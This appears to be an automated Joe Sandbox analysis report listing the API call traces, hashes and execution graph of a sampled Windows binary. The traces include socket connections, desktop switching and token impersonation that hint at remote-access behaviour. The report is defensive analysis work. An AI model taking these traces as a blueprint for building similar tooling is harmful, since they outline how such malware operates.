                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                    • API String ID: 2574300362-736604160
                                                                    • Opcode ID: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
                                                                    • Instruction ID: 88d9777829bf04cc8710f0dfabc1d7fbda4bae52ffa2c7d5b88ac942ae81d74a
                                                                    • Opcode Fuzzy Hash: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
                                                                    • Instruction Fuzzy Hash: FFD0C970691600FAD7105FA4DD2DBC639A6AFC0B06F548026A016E00D4C7FC4880861D
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC
                                                                      • Part of subcall function 00402AD8: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402E3A,?,?,00000000,00000000,00000000), ref: 00402B0A
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1731127917-0
                                                                    • Opcode ID: 1e3fad64e38c237be7588ae4e08319b35da6193c363803fec32d6cfd5e7375db
                                                                    • Instruction ID: e682ebc0571d90e9fd1001dd074fc16d37aecbe567f5019eda1f00a411694e7c
                                                                    • Opcode Fuzzy Hash: 1e3fad64e38c237be7588ae4e08319b35da6193c363803fec32d6cfd5e7375db
                                                                    • Instruction Fuzzy Hash: BE31F672C44114AADB14FBA2DD429EF73BDEF10318B50443FF856B21E1EE3C9A4586A8
                                                                    APIs
                                                                      • Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9
                                                                      • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                      • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00408A64
                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 00408A84
                                                                    • GetDlgItem.USER32(?,000004B7), ref: 00408A97
                                                                    • SetWindowLongW.USER32(00000000,000000FC,Function_00007823), ref: 00408AA5
                                                                      • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                      • Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
                                                                      • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                      • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                      • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                      • Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
                                                                      • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                      • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                      • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                      • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                      • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                      • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                      • Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
                                                                      • Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Window$Long$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoShow
                                                                    • String ID:
                                                                    • API String ID: 3043669009-0
                                                                    • Opcode ID: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
                                                                    • Instruction ID: 5c7c764d92766e680c666047e1d2b266a9282aef260ce17b2660fed0a98cdec4
                                                                    • Opcode Fuzzy Hash: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
                                                                    • Instruction Fuzzy Hash: 62118672E40314ABCB10EBA9DC09FDE77BCEB84714F10446BB652E72D0DAB8A9018B54
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 004070C2
                                                                    • GetSystemMetrics.USER32(00000031), ref: 004070E8
                                                                    • CreateFontIndirectW.GDI32(?), ref: 004070F7
                                                                    • DeleteObject.GDI32(00000000), ref: 00407126
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                    • String ID:
                                                                    • API String ID: 1900162674-0
                                                                    • Opcode ID: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
                                                                    • Instruction ID: 550de309380991ebf2cc5542bfcce979d3dc35c4f0fc859f263023f0ef030489
                                                                    • Opcode Fuzzy Hash: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
                                                                    • Instruction Fuzzy Hash: E4112475A00205EFDB109F94DC88BEA77B8EB44300F0081AAE915A7391DB74AD44CF94
                                                                    APIs
                                                                    • ScreenToClient.USER32(?,?), ref: 004085B0
                                                                    • GetClientRect.USER32(?,?), ref: 004085C2
                                                                    • PtInRect.USER32(?,?,?), ref: 004085D1
                                                                      • Part of subcall function 00407FD8: KillTimer.USER32(?,00000001,?,004085E6), ref: 00407FE6
                                                                    • CallNextHookEx.USER32(?,?,?), ref: 004085F3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ClientRect$CallHookKillNextScreenTimer
                                                                    • String ID:
                                                                    • API String ID: 3015594791-0
                                                                    • Opcode ID: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
                                                                    • Instruction ID: e461164be05bcb912302e6f3c507a6476d35c8a33c6b54d2dcb30444e6ba8619
                                                                    • Opcode Fuzzy Hash: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
                                                                    • Instruction Fuzzy Hash: 53018732110109EBDB15AF65DE44AEA7BA6BB18340B04803EE946A62A1DB34EC01DB49
                                                                    APIs
                                                                      • Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                                      • Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00415778,00415780), ref: 00404168
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00415778,00415780), ref: 00404170
                                                                    • SetWindowTextW.USER32(?,?), ref: 0040417D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404188
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@TextWindow$Length
                                                                    • String ID:
                                                                    • API String ID: 2308334395-0
                                                                    • Opcode ID: 98908755bd8ed0992c476b6f3ce6081942706090f74c84d9117027a34ed09b5c
                                                                    • Instruction ID: 4b6459f0461bbe798f755719163b862091937496e8852bb980e1e24ac321b0cc
                                                                    • Opcode Fuzzy Hash: 98908755bd8ed0992c476b6f3ce6081942706090f74c84d9117027a34ed09b5c
                                                                    • Instruction Fuzzy Hash: 88F0FF72D00108BACF01BBA1DD47CDE7B78AF18349F50406AF515721A1EA359B959B98
                                                                    APIs
                                                                    • GetObjectW.GDI32(?,0000005C,?), ref: 00407931
                                                                    • CreateFontIndirectW.GDI32(?), ref: 00407947
                                                                    • GetDlgItem.USER32(?,000004B5), ref: 0040795B
                                                                    • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 00407967
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFontIndirectItemMessageObjectSend
                                                                    • String ID:
                                                                    • API String ID: 2001801573-0
                                                                    • Opcode ID: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
                                                                    • Instruction ID: 7a034716ce128e2868931ba3036e49d2ca07d686104c333d304994eb71a954cf
                                                                    • Opcode Fuzzy Hash: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
                                                                    • Instruction Fuzzy Hash: B4F05476900704EBE7205BA4DD49FCB7BADAB88B01F108135F911F52D4DBB4E4018B69
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 00401D92
                                                                    • GetWindowRect.USER32(?,?), ref: 00401DAB
                                                                    • ScreenToClient.USER32(00000000,?), ref: 00401DB9
                                                                    • ScreenToClient.USER32(00000000,?), ref: 00401DC0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ClientScreen$ParentRectWindow
                                                                    • String ID:
                                                                    • API String ID: 2099118873-0
                                                                    • Opcode ID: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
                                                                    • Instruction ID: c9a7d6158b24b89f480d793c87918ffc8905022d7cd2aff0562fad3402b16060
                                                                    • Opcode Fuzzy Hash: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
                                                                    • Instruction Fuzzy Hash: 6BE08C73604226ABD7109BA6FC88CCBBFADEFD5762700447AF945A2220C7349C109AB5
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0041212C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID: (nA${D@
                                                                    • API String ID: 613200358-2741945119
                                                                    • Opcode ID: df3286fe78e7f48938a3e8ffcc553a9ec3e0d021733a248802c20134ed18552d
                                                                    • Instruction ID: 2f127b0a99b440bb22087229e66332d50aa0d3dd2037016e8eed2c3918cb49fd
                                                                    • Opcode Fuzzy Hash: df3286fe78e7f48938a3e8ffcc553a9ec3e0d021733a248802c20134ed18552d
                                                                    • Instruction Fuzzy Hash: 8C222771900248DFCB24EF65C9909EEBBB5FF08304F50452FE92A97261DB78A995CF48
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: _wtol
                                                                    • String ID: GUIFlags$^L@
                                                                    • API String ID: 2131799477-2609156739
                                                                    • Opcode ID: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
                                                                    • Instruction ID: e071545e6e42b97a6ff0e24219ab621184b159c44f090b8d4e9d319f90212361
                                                                    • Opcode Fuzzy Hash: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
                                                                    • Instruction Fuzzy Hash: 02F04FB521412386D7342A0995103F7B298EBD47A2FD46437EFC3A21D0C37C4C83926D
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@wsprintf
                                                                    • String ID: (%d%s)
                                                                    • API String ID: 3815514257-2087557067
                                                                    • Opcode ID: 1c4aba05fd2f20ee9555bd842cb662e469eb9df77dbac8d081951f06a7fc6272
                                                                    • Instruction ID: 7ae1222ccb27522ee32bda146f0754d3921d44b98735208d9557fe66e55c1055
                                                                    • Opcode Fuzzy Hash: 1c4aba05fd2f20ee9555bd842cb662e469eb9df77dbac8d081951f06a7fc6272
                                                                    • Instruction Fuzzy Hash: 2FF09671D00218BFDF21BB55DC46EDEB778EF00308F1081BBB552B15E2DA75AA44CA98
                                                                    APIs
                                                                    • GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                                    • GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: TextWindow$Length
                                                                    • String ID: t1@
                                                                    • API String ID: 1006428111-473456572
                                                                    • Opcode ID: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
                                                                    • Instruction ID: 8fdd6815b78bf9020f8e78ba054009a9d995117c016d7113bd8aebbbabd1b082
                                                                    • Opcode Fuzzy Hash: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
                                                                    • Instruction Fuzzy Hash: 6FE06D3A204612AFC311AF19D84486FBBBAFFD4311B00447AF841D72A1CB34DC158B90
                                                                    APIs
                                                                    • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00404472
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: Message
                                                                    • String ID: 7-Zip SFX$Could not allocate memory
                                                                    • API String ID: 2030045667-3806377612
                                                                    • Opcode ID: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
                                                                    • Instruction ID: 20c12d322158c288d9879b49a54fb0f602392e899c52d42c128a52a7ce83e7b7
                                                                    • Opcode Fuzzy Hash: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
                                                                    • Instruction Fuzzy Hash: 79B012703C130C75D50003608C07FC010400B48F03F130412B924E80C1D5E480D0700C

                                                                    Execution Graph

                                                                    Execution Coverage:3.2%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:10.5%
                                                                    Total number of Nodes:1050
                                                                    Total number of Limit Nodes:45
                                                                    execution_graph 23107 7ff74001a130 173 API calls 4 library calls 23108 7ff740023530 120 API calls 2 library calls 23111 7ff74000ff30 11 API calls _getdrive 23112 7ff740024003 249 API calls 2 library calls 23118 7ff740033523 92 API calls 2 library calls 23119 7ff74001d149 96 API calls _RunAllParam 23120 7ff74001e550 97 API calls 23121 7ff740015550 99 API calls 4 library calls 23122 7ff74000a550 104 API calls _RunAllParam 23124 7ff740013550 14 API calls _getdrive 23125 7ff740013d50 12 API calls _getdrive 23127 7ff740029150 89 API calls _RunAllParam 23128 7ff74002d150 177 API calls 3 library calls 23130 7ff740051550 110 API calls _RunAllParam 23133 7ff740006753 RegCloseKey 23135 7ff740019740 101 API calls 2 library calls 23136 7ff740035940 109 API calls 23137 7ff740036d40 165 API calls 4 library calls 23075 7ff74006cd40 inet_addr 23076 7ff74006cdae htons connect 23075->23076 23077 7ff74006cd89 gethostbyname 23075->23077 23078 7ff74006cda1 23076->23078 23079 7ff74006cdd5 23076->23079 23077->23078 23080 7ff74006cd97 23077->23080 23082 7ff7400b7220 _getdrive 8 API calls 23078->23082 23084 7ff74006cf90 setsockopt 23079->23084 23080->23076 23080->23078 23083 7ff74006cded 23082->23083 23085 7ff74006cff9 setsockopt 23084->23085 23086 7ff74006d08a getsockname getpeername 23084->23086 23089 7ff74006d01d 23085->23089 23090 7ff74006d022 WSAIoctl 23085->23090 23087 7ff74006d137 23086->23087 23088 7ff74006d109 SetPerTcpConnectionEStats 23086->23088 23091 7ff7400b7220 _getdrive 8 API calls 23087->23091 23088->23087 23089->23086 23090->23086 23092 7ff74006d14e 23091->23092 23092->23078 23139 7ff740014970 97 API calls 2 library calls 23140 7ff74000ab70 95 API calls _RunAllParam 23141 7ff740010b70 89 API calls 21956 7ff740025958 21957 7ff74002596d 21956->21957 21958 7ff74002597e EnterCriticalSection 21957->21958 22028 7ff74002c2c0 21957->22028 22074 7ff74006d890 97 API calls _RunAllParam 21958->22074 21963 7ff7400259e2 21964 7ff740027afe FlushFileBuffers 21963->21964 21965 7ff740027b2e 21963->21965 21966 7ff740027b7e LeaveCriticalSection 21963->21966 22075 7ff74006dfc0 CloseHandle 21964->22075 21965->21966 21968 7ff740027b4e FlushFileBuffers 21965->21968 22006 7ff740024003 21966->22006 22076 7ff74006dfc0 CloseHandle 21968->22076 21972 7ff740027c72 21973 7ff740027c81 Sleep 21972->21973 21974 7ff740027c95 21972->21974 21973->21974 21975 7ff740027cf7 21974->21975 21976 7ff740027ca6 FlushFileBuffers 21974->21976 21978 7ff740027d08 FlushFileBuffers 21975->21978 21979 7ff740027d59 21975->21979 21976->21975 21977 7ff740027ce6 CloseHandle 21976->21977 21977->21975 21978->21979 21980 7ff740027d48 CloseHandle 21978->21980 22078 7ff74006a3b0 93 API calls 2 library calls 21979->22078 21980->21979 21983 7ff740027d62 21984 7ff740027d85 21983->21984 22079 7ff740032170 16 API calls 21983->22079 21985 7ff740027dbc 21984->21985 21986 7ff740027d9d CloseDesktop 21984->21986 21995 7ff740003730 _RunAllParam 89 API calls 21985->21995 21986->21985 21989 7ff740027da7 21986->21989 21987 7ff740032220 GetLastError PostMessageA EnterCriticalSection LeaveCriticalSection 21987->22006 21992 7ff740003730 _RunAllParam 89 API calls 21989->21992 21990 7ff740003730 89 API calls _RunAllParam 21990->22006 21992->21985 21993 7ff7400231b0 27 API calls 21993->22006 21994 7ff74002c590 16 API calls 21994->22006 21998 7ff740027dfc GetModuleFileNameA 21995->21998 21996 7ff74006d440 16 API calls 21996->22006 22001 7ff740027e56 LoadLibraryA 21998->22001 22002 7ff740027e15 21998->22002 21999 7ff74002419d GetTickCount 21999->22006 22008 7ff740027e6b GetProcAddress 22001->22008 22009 7ff740027e9d 22001->22009 22080 7ff7400ba140 70 API calls 3 library calls 22002->22080 22004 7ff74006d890 97 API calls 22004->22006 22006->21972 22006->21987 22006->21990 22006->21993 22006->21994 22006->21996 22006->21999 22006->22004 22016 7ff740027c47 CloseDesktop 22006->22016 22018 7ff7400240bf CloseDesktop 22006->22018 22065 7ff74006a5b0 98 API calls 2 library calls 22006->22065 22066 7ff740003730 22006->22066 22070 7ff74006a3b0 93 API calls 2 library calls 22006->22070 22071 7ff7400695d0 EnterCriticalSection LeaveCriticalSection 22006->22071 22072 7ff74002c6f0 18 API calls _RunAllParam 22006->22072 22073 7ff7400142a0 119 API calls _snprintf 22006->22073 22077 7ff74002c4e0 93 API calls _RunAllParam 22006->22077 22007 7ff740027c54 22011 7ff740003730 _RunAllParam 89 API calls 22007->22011 22012 7ff740027e8f FreeLibrary 22008->22012 22021 7ff740027edd 22009->22021 22081 7ff74001e580 97 API calls _RunAllParam 22009->22081 22010 7ff740027e26 22010->22001 22011->21972 22012->22009 22016->21972 22016->22007 22018->22006 22022 7ff740027fb2 22021->22022 22024 7ff740003730 _RunAllParam 89 API calls 22021->22024 22083 7ff7400b7220 22022->22083 22026 7ff740027f3e 22024->22026 22025 7ff740027ff0 22082 7ff74006ab00 95 API calls _RunAllParam 22026->22082 22029 7ff740003730 _RunAllParam 89 API calls 22028->22029 22030 7ff74002c309 EnterCriticalSection 22029->22030 22032 7ff74002c348 22030->22032 22033 7ff74002c338 LeaveCriticalSection 22030->22033 22035 7ff74002c363 22032->22035 22036 7ff74002c353 LeaveCriticalSection 22032->22036 22034 7ff74002c4b7 22033->22034 22037 7ff7400b7220 _getdrive 8 API calls 22034->22037 22038 7ff74002c37e 22035->22038 22039 7ff74002c36e LeaveCriticalSection 22035->22039 22036->22034 22041 7ff74002c4c7 22037->22041 22040 7ff740003730 _RunAllParam 89 API calls 22038->22040 22039->22034 22042 7ff74002c393 22040->22042 22041->21958 22094 7ff74006a130 73 API calls _getdrive 22042->22094 22044 7ff74002c39a 22045 7ff74002c3cd 22044->22045 22046 7ff74002c39e 22044->22046 22095 7ff74006a0c0 22045->22095 22047 7ff740003730 _RunAllParam 89 API calls 22046->22047 22049 7ff74002c3bc LeaveCriticalSection 22047->22049 22049->22034 22050 7ff74002c3d7 22051 7ff740003730 _RunAllParam 89 API calls 22050->22051 22052 7ff74002c3f1 22051->22052 22053 7ff74002c4a1 22052->22053 22098 7ff740069bc0 LoadLibraryA 22052->22098 22054 7ff74002c4a3 LeaveCriticalSection 22053->22054 22054->22034 22056 7ff74002c40f 22057 7ff74002c480 22056->22057 22058 7ff74002c413 OpenProcess OpenProcessToken 22056->22058 22057->22054 22062 7ff74002c491 timeGetTime 22057->22062 22059 7ff74002c43d 22058->22059 22060 7ff74002c446 ImpersonateLoggedOnUser 22058->22060 22063 7ff740003730 _RunAllParam 89 API calls 22059->22063 22060->22059 22061 7ff74002c46c CloseHandle CloseHandle 22060->22061 22061->22057 22062->22054 22064 7ff74002c46a 22063->22064 22064->22061 22065->22006 22067 7ff740003746 22066->22067 22068 7ff740003765 OpenInputDesktop 22066->22068 22067->22068 22233 7ff740053740 89 API calls 3 library calls 22067->22233 22068->22006 22068->22007 22070->22006 22072->22006 